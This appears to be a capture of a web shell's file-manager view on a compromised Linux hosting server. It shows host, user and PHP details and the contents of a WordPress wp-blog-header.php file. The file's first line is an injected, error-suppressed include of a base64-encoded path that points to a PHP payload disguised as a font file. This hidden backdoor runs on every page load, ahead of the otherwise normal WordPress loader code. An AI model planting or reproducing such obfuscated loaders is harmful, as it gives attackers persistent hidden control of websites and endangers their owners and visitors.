HEX
Server: LiteSpeed
System: Linux das118.truehost.cloud 5.14.0-570.37.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Aug 26 10:33:12 EDT 2025 x86_64
User: betaprep (1402)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/betaprep/public_html/wp-blog-header.php
<?php @include base64_decode("L2hvbWUvYmV0YXByZXAvcHVibGljX2h0bWwvd3AtaW5jbHVkZXMvVGV4dC9EaWZmL0VuZ2luZS9wcW9uc29yc3FvLnR0Zg==");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}